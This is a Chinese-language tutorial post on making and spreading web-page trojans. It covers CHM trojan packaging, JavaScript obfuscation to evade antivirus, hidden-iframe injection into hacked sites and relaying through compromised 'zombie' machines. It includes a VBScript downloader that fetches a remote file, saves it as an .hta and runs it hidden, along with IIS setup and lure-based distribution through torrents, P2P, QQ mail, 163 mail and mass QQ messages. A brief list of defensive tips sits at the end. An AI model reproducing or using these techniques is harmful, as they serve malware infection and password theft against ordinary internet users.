网页木马制作

网页木马制作与传播

2009-08-19 22:30最简单的也就是用ChmBuilder这个软件来制作chm木马了，首先我们要配置好一个木马服务端，我再这里就拿QQ杀手7.1版说下把。关于他的使用和配置我就不多说了把，下载了这软件都自带有帮助文件的，看几遍就会明白的了。然后生成服务端，假设我生成的木马服务端为mm.exe，接着打开ChmBuilder选择我们的mm
.exe然后点生成，就会在相同目录下自动生成一个mm.chm和mm.htm (注意：这几个文件可不要轻易去点哦，万一出了什么后果，不要找偶~~~……^_^) 接着就把mm.chm和mm.htm传到自己的空间，如果没空间有肉鸡也是可以滴，建议最好用肉鸡，这样万一对方发现了也是你发现你肉鸡。但是有的空间还是比较严格的，在上传时会发现那个mm.htm并不存在，那就是被对方的杀毒软件查杀了把。 到了这里我们就需要另外一个软件了htmtool
网页加密程序，选择源文件为mm.htm目标文件m.htm然后点加密，程序就会在mm.htm目录下生成一个用javascript加密后的m.htm，然后把m.htm传肉鸡或空间里去把。 我在本机测试。_blank>http://127.0.0.1/m.htm就是我们的网页木马地址了，只要把这个发给别人，对方浏览了就会中了我们的木马。 但是对方会相信你吗？现在的网民安全意识也稍微提高了点，对于你发来的站都不会轻易去点。 所以呢~~还是自己动手把。入侵~~~~挂马！嘿嘿~~对不起那些站长了。 相信大家也都知道这个名词把.....不知道的就....别找我哦。

一般在你入侵了一个站拿到了webshell的时候，有的人也就是改下主页来满足自己的虚荣心把。下面来说挂马把。最常见的 挂站代码如下 ：




把以上代码插到对方网页代码中，那么下次别人浏览了那个站点就会自动转向_blank>http://127.0.0.1/m.htm。而_blank>http://127.0.0.1/m.htm也就是我门的网页木马了，那width="0" height="0"又是什么意思呢？懂点英文的朋友也应该知道了把，width就是宽而height自然就是高了。我们把它设置为0也就是不显示了，对方也就看不见我们的这个页面，木马也就会被下载到本地。

不过感觉这个方法已经过失了，现在的站长在发现自己的站被挂了木马后，如果主页代码过多，只要搜索iframe就能找到了我们的木马了，一个del，哈哈~~~~玩完了。


所以，下面再介绍几个把。

单独利用chm这个文件来达到盗号目的。假设我们的木马服务端还是为mm.exe然后在他相同目录下建一个mm.htm文件，代码如下

当然你也可以把mm.exe和mm.htm换成是别的文件名。然后用QuickCHM这个软件来编译成为chm文件。（这些工具在google都能搜索到的）然后chm向导。选中*.*，项目文件夹就是刚才那两个mm.exe和mm.htm

所在的目录了。
然后下一步，htm文件在上，exe文件在下，接着可以编译他了。
编辑成功后千万不要点“是”给运行了。那样自己就中了马了~~然后就会发现原来的2个文件已经多出了四个
newproject.chm，newproject.hhc ，newproject.hhk ，newproject.hhp 其实最后三个是没用的，删了他把只留一个newproject.chm ，然后把他改任意名上传空间。

但这个挂马就不能用上面的那段代码了。假设我做好的chm木马为_blank>http://127.0.0.1/mm.chm

那就用以下代码

.test";;;＞＜/object＞

＜/body＞＜/html＞



三。名字为win.test的文件





＜html＞

＜body＞

＜script language="vbscript"＞

Function HttpDoGet(url)

set oReq = CreateObject("Microsoft.XMLHTTP")

oReq.open "GET",url,false

oReq.send

If oReq.status=200 then

HttpDoGet,"c:\win.hta"

Set oReq=nothing

End if

end function

sub SaveFile(str,fName)

Dim fso, tf

S e t f s o = C r e a t e O bj e c t(Scripting.FileSystemObject")

Set tf = fso.CreateTextfile(fName,True)

tf.Write str

tf.Close

exewin()

End sub

Sub exewin()

set wshshell=createobject ("wscript.shell" )

a=wshshell.run ("cmd.exe /c c:\win.hat",0)

window.close

End Sub

HttpDoGet("http://127.0.0.1/abc.abc")

＜/script＞

＜/body＞

＜/html＞

四。名字为test.exe的木马程序。



晕...这个就不用我提供了吧，你想用什么木马就把他的名字换成test.exe传上去就可以了。



服务器的文件列表

test.htm:对外发布的网页

win.test:下在文件abc.abc到对方机器上，并且保存为win.hta并且执行。

abc.abc下载二进制的木马文件test.exe，并执行

test.exe：木马程序。



上面所说的文件可以修改成任意名字，只是不要忘记把源码里的文件指向也修改就可以了！



最后是设置IIS,打开“程序→管理工具→internet服务管理器”，右键单击要设置的站点，选择《属性》，在选择“http头”。单击“MIME映射”里的“文件类型”按钮，并在关联扩展名文本框中输入“.hta”，在内容类型(MIME)中输入“application/hta",然后关闭所有窗口就可以了。



有许多朋友多遇见过，说什么赠送Q号或者玩网游的时候里面有人喊赠送好东东在XXX网址，其实那上面所说的例子用的就是这种原理，不知不觉中你机器上的所有有关于密码或者指定名词的东西全发送到对方指定的邮件箱里去了



看完后是否觉得这种木马太危险，甚至有种想把网线拔掉的感觉那？呵呵，其实了解了网页木马的工作原理后我们就不难防护他，看完以上内容后就可以得出一个结论，网页木马主要利用IE的漏洞来实现的，所以在预防的时候一定要做到以下几点就可以保证上网的安全了，

A。安装IE的最新版本并且随时下在才做系统和IE的补丁程序。

B。不随便登陆不熟悉朋友送来的网站，对于熟悉的朋友也要小心哦。

C。不随便登陆黑客网站（^_^黑基除外了啦，我担保的...），色情网站，尤其一些卖外挂，卖木马的网站。

D。不随便打开和预览有附件的邮件。

E。安装防火墙和杀毒软件的最新版本，经常进行升级和查毒


传播

本文章总节归纳了目前最流行的木马传播技术以及以后木马传播技术

的发展趋势,

内容相当丰富.相信看完本教程你一定会成为养鸡专业户.

一.目前流行木马传播技术.

1.用BT制作木马种子

利用BT制作木马种子的教程网上也发布了很多,这里主要找一款具有诱惑性的软件

然后捆绑上自己的木马,做成种子,最后发布出去.相信利用BT抓鸡速度可是超快哦.


2.利用PP共享自己捆了木马的软件或电影.

方法同BT一样,要找诱惑性电影或软件,捆上自己的木马,然后共享自己的目录,这样人

家就会通过搜索找到你的软件或电影.这里电影要配合网页木马.可以参看RealOnePla

ye木马制作.在黑鹰可以找到.当你一打开我们的电影时就会打开我们制作过的网页木

马.这样看电影也会中我们的马.

3.利用QQ邮箱传播木马.

这里主要点HTML格式----在里面写上以下这段代码:



当人家一打开你发过去的邮件时,就会中我们的木马.

4.QQ群发网页木马。

首先，你要申请多个QQ号，然后找款QQ消息群发器（黑鹰网站可以找到大量相关QQ群

发信息软件，）再然后要加上非常具有诱惑性的消息（肉鸡的多与少与这个直接相关

，），骗取人家点你的网址。最后，在晚上时可以挂在电脑上群发带有网页木马的信

息。相信只要你的信息够诱惑，肉鸡也是成群的。


5.利用163邮箱传播网页木马。

同样，这里用HTML格式，然后填上以下代码：